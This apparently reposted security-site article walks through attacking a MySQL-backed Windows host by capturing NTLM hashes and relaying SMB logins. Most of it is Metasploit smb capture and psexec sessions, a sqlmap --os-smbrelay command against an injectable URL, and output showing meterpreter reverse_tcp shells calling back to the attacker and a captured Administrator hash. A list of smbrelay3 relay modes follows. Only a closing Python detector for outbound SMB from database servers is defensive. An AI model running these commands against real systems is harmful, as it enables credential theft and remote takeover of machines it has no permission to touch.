Iron Sky Security Service Center

MySQL Database Attack Techniques

Source: unknown  Time:
 

msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > show options

Module options (auxiliary/server/capture/smb):

   Name        Current Setting   Required  Description
   ----        ---------------   --------  -----------
   CAINPWFILE                    no        The local filename to store the hashes in Cain&Abel format
   CHALLENGE   1122334455667788  yes       The 8 byte challenge
   JOHNPWFILE                    no        The prefix to the local filename to store the hashes in JOHN format
   SRVHOST     0.0.0.0           yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     445               yes       The local port to listen on.
   SSL         false             no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3              no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

msf auxiliary(smb) > exploit
[*] Auxiliary module execution completed

[*] Server started.
msf auxiliary(smb) >
 
Then try reading the share from the target.

^_^ Successfully captured the NTLM hash:
NTLMv1 Response Captured from 192.1.1.130:1162
USER:Administrator DOMAIN:DIS9TEAM-B39270 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
LMHASH:be55aab30bf2e1268f57f90887c0d68e2f85252cc731bb25
NTHASH:54b41c2204df7a9e1478f3cfa64bd9e250f57a764a0eef36
 
Next, the Metasploit exploit/windows/smb/psexec module, or the Nessus SMB Shell, can be used to obtain system privileges:
msf exploit(psexec) > exploit

[*] Started reverse handler on 192.1.1.1:1111
[*] Connecting to the server...
[*] Authenticating to 192.1.1.130:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created HgLceCLd.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.1.1.130[svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.1.1.130[svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (wZdMvYRY - "MWrLYVvwSxdptGUwjxeJoQYxVEOvvSh")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting HgLceCLd.exe...
[*] Sending stage (752128 bytes) to 192.1.1.130
[*] Meterpreter session 1 opened (192.1.1.1:1111 -> 192.1.1.130:1168) at 2012-01-09 16:56:34 +0800
 
 
 
If you find the steps above too cumbersome, you can use SQLMAP instead. The powerful injection tool SQLMAP provides the whole chain as a one-stop service:
brk@Dis9Team:~/t/sqlmap$ sudo ./sqlmap.py -u "http://192.1.1.130/sql/index.php?id=1" --msf-path=/home/brk/t/msf3/ --os-smbrelay
[sudo] password for brk:

sqlmap/0.9 - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 17:04:54

[17:04:54] [INFO] using '/home/brk/t/sqlmap/output/192.1.1.130/session' as session file
[17:04:54] [INFO] testing connection to the target url
[17:04:54] [INFO] testing if the url is stable, wait a few seconds
[17:04:55] [INFO] url is stable
---------------- omitted -------------
[17:05:06] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] y
sqlmap identified the following injection points with a total of 22 HTTP(s) requests:
---
---

[17:05:11] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.0.63, PHP 5.2.14
[17:05:11] [WARNING] it is unlikely that this attack will be successful because by default MySQL on Windows runs as Local System which is not a real user, it does not send the NTLM session hash when connecting to a SMB service
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
> 1
which is the local address? [192.1.1.1]
which local port number do you want to use? [50803] 5588
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 1
which SMB port do you want to use?
[1] 139/TCP
[2] 445/TCP (default)
> 2
[17:06:34] [INFO] running Metasploit Framework 3 console locally, please wait..

[*] Processing /home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt for ERB directives.
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> use windows/smb/smb_relay
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set SRVHOST 192.1.1.1
SRVHOST => 192.1.1.1
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set SRVPORT 445
SRVPORT => 445
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set LPORT 5588
LPORT => 5588
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set LHOST 192.1.1.1
LHOST => 192.1.1.1
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> exploit
[*] Exploit running as background job.
---------------------------------
[*] Started reverse handler on 192.1.1.1:5588
[*] Server started.
[*] Deleting AaTNBUvw.exe...
[*] Sending Access Denied to 192.1.1.130:1204 DIS9TEAM-B39270Administrator
[*] Sending stage (752128 bytes) to 192.1.1.130
[*] Meterpreter session 1 opened (192.1.1.1:5588 -> 192.1.1.130:1205) at 2012-01-09 17:06:51 +0800

Active sessions
===============

  Id  Type                   Information  Connection
  --  ----                   -----------  ----------
  1   meterpreter x86/win32               192.1.1.1:5588 -> 192.1.1.130:1205
 
 
 


What if you are on a Windows system? You can use the tool smbrelay3.exe for this attack.

It offers five attack modes:

* HTTP to SMB: Negotiate authentication with an HTTP client and relay credentials to another SMB host.

* SMB to SMB: Negotiate authentication with an SMB computer and relay credentials to another Windows computer.

* IMAP to SMB: Negotiate authentication with an email IMAP client and relay credentials to another host.

* POP3 to SMB: Negotiate authentication with an email POP3 client and relay credentials to another host.

* SMTP to SMB: Negotiate authentication with an email SMTP client and relay credentials to another SMB computer.
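A defender-side detection example added here (not from the original post, sqlmap, Metasploit or smbrelay3): the sqlmap --os-smbrelay run above and every smbrelay3 mode depend on a victim being tricked into opening an outbound SMB connection to a listener the attacker controls, so a database server initiating SMB towards an unknown peer, followed shortly by another connection to the same peer, is the pattern worth alerting on. The log line format and the 192.1.1.x hosts are constructed for the example.

```python
import re
from datetime import datetime

# Constructed sample of outbound-connection log lines (not from the original
# page); 192.1.1.130 is the database server, 192.1.1.1 an unknown peer.
SAMPLE_LOG = """\
2012-01-09 17:06:40 TCP 192.1.1.130:1204 -> 192.1.1.1:445 SYN
2012-01-09 17:06:51 TCP 192.1.1.130:1205 -> 192.1.1.1:5588 SYN
2012-01-09 17:07:02 TCP 192.1.1.130:1210 -> 192.1.1.10:445 SYN
2012-01-09 17:07:30 TCP 192.1.1.50:52311 -> 192.1.1.130:3306 SYN
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) TCP "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)")
SMB_PORTS = {139, 445}


def parse_log(log_text):
    """Yield (timestamp, src, dst, dport) for each well-formed line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
            yield ts, m["src"], m["dst"], int(m["dport"])


def find_outbound_smb(log_text, db_servers, file_servers=frozenset()):
    """SMB connections initiated BY a database server towards a host that is
    not an approved file server: the footprint of a coerced SMB login."""
    return [(ts, src, dst, dport) for ts, src, dst, dport in parse_log(log_text)
            if src in db_servers and dport in SMB_PORTS and dst not in file_servers]


def correlate_followup(log_text, smb_hits, window_seconds=120):
    """For each SMB hit, find the first later non-SMB connection from the same
    server to the same peer (relayed login followed by a reverse connection)."""
    conns = list(parse_log(log_text))
    chains = []
    for ts, src, dst, _ in smb_hits:
        for ts2, src2, dst2, dport2 in conns:
            if ((src2, dst2) == (src, dst) and dport2 not in SMB_PORTS
                    and 0 < (ts2 - ts).total_seconds() <= window_seconds):
                chains.append((src, dst, dport2))
                break
    return chains
```

The same rule applied to mail and web clients (any host initiating SMB to a peer it has no file-sharing relationship with) covers the other smbrelay3 modes; a host firewall that blocks outbound 139/445 from database servers removes the precondition entirely.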
 
